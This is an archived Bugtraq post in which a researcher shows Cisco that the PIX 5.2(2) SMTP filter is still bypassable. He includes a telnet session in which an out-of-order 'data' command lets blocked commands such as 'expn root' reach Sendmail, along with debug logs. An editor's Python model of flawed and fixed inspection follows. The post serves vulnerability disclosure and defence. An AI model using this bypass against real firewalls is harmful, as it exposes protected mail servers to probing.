[17024] in bugtraq
Re: Cisco PIX Firewall (smtp content filtering hack) [Finally
daemon@ATHENA.MIT.EDU (Fabio Pietrosanti (naif))
Tue Oct 3 14:08:00 2000
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.LNX.4.21.0010031112260.29301-100000@naif.inet.it>
Date: Tue, 3 Oct 2000 11:15:25 +0200
Reply-To: naif@inet.it
From: "Fabio Pietrosanti (naif)" <fabio@TELEMAIL.IT>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <3.0.6.32.20000921162459.007c76b0@mail_server.space.gr>
Hi,
This is the e-mail I sent to Cisco security-alert.
Today Cisco released 5.2(4), which also fixes this bug ...
The Cisco patch for the "SMTP content filtering tricks proposed by
naif@inet.it" could be
avoided with the "SMTP content filtering tricks proposed by Lincoln Yeoh
<lyeoh@pop.jaring.my>".
The little hack I posted on bugtraq on "Tue, 19 Sep 2000" works because
the PIX completely disables the sanity check after the "data" command.
Cisco released the new PIX version, which we installed on our test PIX:
5.2(2).
The Cisco advisory is:
http://www.cisco.com/warp/public/707/PIXfirewallSMTPfilter-pub.shtml
Then I read on bugtraq about a trick from July similar to my advisory:
http://www.securityfocus.com/templates/archive.pike?threads=0&list=1&end=2000-07-09&tid=68903&start=2000-07-03&
So, 5.2(2) should avoid this problem and SMTP content filtering should
work...
Here is our PIX test:
newpix# sh ver
Cisco Secure PIX Firewall Version 5.2(2)
Compiled on Sun 24-Sep-00 18:59 by morlee
newpix up 19 hours 27 mins
Hardware: SE440BX2, 128 MB RAM, CPU Pentium II 349 MHz
Flash i28F640J5 @ 0x300, 16MB
BIOS Flash AT29C257 @ 0xfffd8000, 32KB
0: ethernet0: address is 00d0.b790.41a5, irq 11
1: ethernet1: address is 00d0.b790.54d4, irq 10
2: ethernet2: address is 00e0.b601.d289, irq 15
3: ethernet3: address is 00e0.b601.d288, irq 9
4: ethernet4: address is 00e0.b601.d287, irq 11
5: ethernet5: address is 00e0.b601.d286, irq 10
Licensed Features:
Failover: Enabled
VPN-DES: Enabled
VPN-3DES: Enabled
Maximum Interfaces: 6
Cut-through Proxy: Enabled
Guards: Enabled
Websense: Enabled
Throughput: Unlimited
ISAKMP peers: Unlimited
And the line regarding fixup in the config is:
fixup protocol smtp 25
===== Here is the session...
<naif@naif> [~] $ telnet ourtest 25
Trying 10.10.10.2...
Connected to eagletmp.
Escape character is '^]'.
data wow
expn root
vrfy root
help
helo pinco
220 **************************************************2******2000 ******00
*0200 ******
503 Need MAIL command
250 Pinco Pallino <pinco@ourtest.ourdomain.it>
250 <root@ourtest.ourdomain.it>
214-This is Sendmail version 8.9.1
214-Topics:
214- HELO EHLO MAIL RCPT DATA
214- RSET NOOP QUIT HELP VRFY
214- EXPN VERB ETRN DSN
214-For more info use "HELP <topic>".
214-To report bugs in the implementation send email to
214- sendmail-bugs@sendmail.org.
214-For local information send email to Postmaster at your site.
214 End of HELP info
250 ourtest.ourdomain.it Hello [10.10.10.10], pleased to meet you
quit
221 ourtest.ourdomain.it closing connection
Connection closed by foreign host.
#### As you can see, we could bypass the "fixup smtp"
===== Here is the Cisco PIX debug
tcp: TCP MSS changed to 1380
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
tcp: SYN out rcvd
tcp: TCP MSS changed to 1380
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
tcp: exiting embyonic
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
tcp: TCP MSS changed to 1380
tcp: TCP MSS changed to 1380
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp: data command
smtp: entering data mode
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
tcp: TCP MSS changed to 1380
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
tcp: TCP MSS changed to 1380
tcp: TCP MSS changed to 1380
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp: quit command
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp_respond: ERR: bad reply code
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
=====
To Cisco:
Please also check CBAC carefully, because I think that it also affects IOS
CBAC inspect.
I'll release the advisory for this new version on bugtraq next week, so
you could release a new PIX version.
On Thu, 21 Sep 2000, Ioannis Migadakis wrote:
> This particular vulnerability is not new.
>
> It was posted to BUGTRAQ on 9 Jul 2000 by Lincoln Yeoh with the title
> "Out of order SMTP DATA commands incorrectly allow pass-through mode in
> some firewall smtp filters/proxies"
>
> The original post (does not say anything about Cisco PIX) can be found at:
>
> http://www.securityfocus.com/templates/archive.pike?threads=0&list=1&end=2000-07-09&tid=68903&start=2000-07-03&
>
> Ioannis Migadakis
>
naif
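Editor's note: the failure the post describes is an SMTP inspector that enters pass-through (message body) mode as soon as the client sends DATA, without waiting for the server to accept it with a 354 reply, so a DATA sent out of order (rejected by the server with 503) switches inspection off for the rest of the connection. The following Python model is an added example written for this note; it is not PIX code and not from the author. It replays a constructed version of the session above through two inspectors, one that trusts the client's DATA (the flawed behaviour) and one that waits for the server's 354, and also replays a well-formed transaction to show that the fixed inspector still passes body lines that merely look like commands. The allowed-verb set and the event ordering are assumptions made for the example.

```python
"""Model of client-trusting vs. server-confirmed SMTP data mode (added example)."""
from typing import List, Tuple

# Assumed command set the inspector permits outside the message body
# (modelled on a minimal-command SMTP guard; not taken from the PIX source).
ALLOWED_VERBS = {"HELO", "EHLO", "MAIL", "RCPT", "DATA", "RSET", "NOOP", "QUIT"}

Event = Tuple[str, str]  # ("C", client line) or ("S", server reply line)


class SmtpInspector:
    """Tracks SMTP state on one TCP stream and gives a verdict per client line.

    trust_client_data=True reproduces the flawed behaviour: body mode starts
    the moment the client *sends* DATA, even if the server rejects it (503),
    so every later client line is treated as uninspected message body.
    trust_client_data=False starts body mode only after the server's 354.
    """

    def __init__(self, trust_client_data: bool) -> None:
        self.trust_client_data = trust_client_data
        self.in_body = False       # between an accepted DATA and the "." terminator
        self.data_pending = False  # DATA sent by client, server reply not yet seen

    def client_line(self, line: str) -> str:
        if self.in_body:
            if line == ".":
                self.in_body = False
            return "body"          # message content is not command-inspected
        verb = line.split(maxsplit=1)[0].upper() if line.strip() else ""
        if verb not in ALLOWED_VERBS:
            return "block"
        if verb == "DATA":
            if self.trust_client_data:
                self.in_body = True
            else:
                self.data_pending = True
        return "pass"

    def server_line(self, line: str) -> None:
        if self.data_pending:
            self.data_pending = False
            # Only a 354 intermediate reply means the server accepted DATA;
            # a 503 (or any other reply) keeps the inspector in command mode.
            if line.startswith("354"):
                self.in_body = True


def inspect(events: List[Event], trust_client_data: bool) -> List[Tuple[str, str]]:
    """Return (client line, verdict) pairs for a stream of events."""
    insp = SmtpInspector(trust_client_data)
    verdicts = []
    for who, line in events:
        if who == "C":
            verdicts.append((line, insp.client_line(line)))
        else:
            insp.server_line(line)
    return verdicts


def blocked(events: List[Event], trust_client_data: bool) -> List[str]:
    """Client lines the inspector would have refused to forward."""
    return [line for line, v in inspect(events, trust_client_data) if v == "block"]


# Constructed replay of the posted session in the order the firewall sees the
# bytes: the client pipelined its commands, the server's replies came later.
OUT_OF_ORDER_SESSION: List[Event] = [
    ("S", "220 ourtest.ourdomain.it ESMTP"),
    ("C", "data wow"),
    ("C", "expn root"),
    ("C", "vrfy root"),
    ("C", "help"),
    ("C", "helo pinco"),
    ("S", "503 Need MAIL command"),
    ("S", "250 Pinco Pallino <pinco@ourtest.ourdomain.it>"),
    ("S", "250 <root@ourtest.ourdomain.it>"),
    ("S", "214 End of HELP info"),
    ("S", "250 ourtest.ourdomain.it Hello [10.10.10.10], pleased to meet you"),
    ("C", "quit"),
    ("S", "221 ourtest.ourdomain.it closing connection"),
]

# Constructed well-formed transaction: DATA is accepted with 354, so the body,
# including a line that merely looks like a command, must pass uninspected.
NORMAL_SESSION: List[Event] = [
    ("S", "220 ourtest.ourdomain.it ESMTP"),
    ("C", "helo pinco"),
    ("S", "250 ourtest.ourdomain.it Hello"),
    ("C", "mail from:<pinco@ourtest.ourdomain.it>"),
    ("S", "250 Sender ok"),
    ("C", "rcpt to:<root@ourtest.ourdomain.it>"),
    ("S", "250 Recipient ok"),
    ("C", "data"),
    ("S", '354 Enter mail, end with "." on a line by itself'),
    ("C", "Subject: test"),
    ("C", "expn root"),
    ("C", "."),
    ("S", "250 Message accepted for delivery"),
    ("C", "quit"),
    ("S", "221 closing connection"),
]

if __name__ == "__main__":
    for name, events in (("out-of-order", OUT_OF_ORDER_SESSION), ("normal", NORMAL_SESSION)):
        print(f"{name}: client-trusting inspector blocks {blocked(events, True)}")
        print(f"{name}: server-confirmed inspector blocks {blocked(events, False)}")
```

The design point is that the "in data mode" decision belongs to the server's reply, not to the client's request; an inspector that keys off the client alone can be steered into pass-through by anyone who can type DATA. Checking the 354 also makes the fixed inspector safe for legitimate mail: a body line such as "expn root" is still forwarded untouched once the server has accepted DATA.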